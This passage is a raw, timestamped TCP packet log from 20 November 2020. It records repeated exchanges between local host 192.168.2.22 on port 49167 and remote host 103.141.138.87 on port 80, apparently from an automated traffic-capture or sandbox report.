                              Nov 20, 2020 11:27:51.829018116 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829027891 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829051018 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829070091 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829082966 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829096079 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829113960 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829282999 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829304934 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829323053 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829336882 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829356909 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829368114 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829374075 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829407930 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829428911 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829449892 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829472065 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829480886 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829488993 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829508066 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829515934 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829535961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829544067 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829564095 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829572916 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829591990 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829602003 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829627991 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829633951 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829654932 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829663038 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829680920 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829691887 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829710007 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829719067 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829740047 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.829749107 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.829775095 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.832303047 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.837672949 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.837752104 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.837781906 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.837802887 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.837821007 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.837841034 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.838923931 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.841957092 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.841985941 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842008114 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842032909 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842040062 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842061043 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842073917 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842080116 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842099905 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842116117 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842132092 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842139006 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842159033 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842168093 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842187881 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842196941 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842216969 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842225075 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842247009 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842257023 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842278004 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842287064 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842307091 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842314959 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842335939 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842344999 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842365026 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842372894 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842391968 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842402935 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842427969 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842434883 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842457056 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842464924 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842490911 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842498064 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842518091 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842526913 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842545986 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:51.842554092 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.842587948 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:51.845726013 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.048831940 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.048868895 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.048887014 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.048909903 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.048930883 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.048953056 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.048974037 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.048990011 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.049014091 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.049022913 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.049036980 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.049072027 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051264048 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051296949 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051312923 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051333904 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051357031 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051378012 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051393986 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051414967 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051429033 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051448107 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051454067 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051476955 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051489115 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051508904 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051522017 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051537991 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051551104 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051573992 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051587105 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051604033 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051616907 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051639080 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051657915 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051671028 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051681995 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051702976 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.051719904 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.051733971 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.052896976 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.056708097 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.056741953 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.056819916 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.057647943 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.057723999 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.060511112 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.061562061 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.061590910 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.061608076 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.061630011 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.061654091 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.061667919 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.061676979 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.061700106 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.061713934 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.061733961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.061758995 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.061765909 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.061777115 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.061816931 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064286947 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064625978 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064655066 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064676046 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064697981 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064713001 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064733982 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064755917 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064769983 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064775944 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064779043 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064800978 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064810038 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064831018 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064841032 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064861059 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064868927 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064889908 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064902067 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064922094 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064932108 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064955950 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064964056 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.064985037 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.064996004 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.065025091 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.067790985 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.268089056 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268120050 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268132925 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268148899 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268165112 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268182039 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268199921 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268220901 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268239021 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268251896 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268264055 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268276930 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268300056 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.268312931 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268333912 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.268351078 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.268358946 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.268368006 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268384933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268404961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.268409967 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.268415928 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.268436909 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.270832062 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.270863056 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.270879984 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.270895958 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.270911932 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.270930052 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.270947933 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.270961046 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.270970106 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.270983934 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.270993948 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271011114 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271028042 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271035910 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271049023 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271056890 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271073103 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271087885 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271102905 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271119118 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271127939 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271131992 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271142960 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271145105 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271147013 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271158934 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271167040 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271183014 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271192074 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271207094 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271217108 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271233082 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271250963 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271258116 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271280050 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271286011 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271301985 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271311045 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271327019 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271332026 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271341085 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271353960 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271364927 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271377087 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271384954 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271399021 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271405935 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271420956 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271440983 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271445990 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271459103 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271473885 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271478891 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271495104 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271509886 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271517038 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271524906 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271538973 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.271549940 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.271564960 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.276034117 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.276062965 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.276074886 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.276087046 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.276195049 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.276696920 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.276715040 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.276820898 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281184912 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281227112 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281250954 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281276941 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281296968 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281331062 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281347990 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281379938 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281407118 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281428099 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281441927 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281476974 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281506062 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281527042 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281541109 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281550884 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281575918 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281589985 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281608105 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281616926 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281641006 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281652927 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281677961 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281685114 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281704903 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281723022 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281740904 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.281748056 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.281780005 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284246922 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284279108 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284300089 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284323931 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284349918 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284365892 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284377098 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284387112 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284405947 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284429073 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284450054 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284462929 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284468889 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284488916 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284499884 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284522057 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284528017 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284548998 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284559965 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284575939 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284585953 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284606934 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284626007 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284636021 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284645081 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284668922 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284677982 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284704924 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284715891 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284735918 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284748077 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284771919 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284796000 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284806967 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284818888 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284831047 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284847021 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284871101 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284884930 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284904003 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284910917 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284934044 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284949064 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284966946 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.284972906 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.284996986 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.285007000 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.285029888 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.285038948 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.285065889 CET4916780192.168.2.22103.141.138.87
                              Nov 20, 2020 11:27:52.487340927 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487371922 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487384081 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487400055 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487416029 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487432003 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487447977 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487462997 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487478018 CET8049167103.141.138.87192.168.2.22
                              Nov 20, 2020 11:27:52.487493992 CET8049167103.141.138.87192.168.2.22
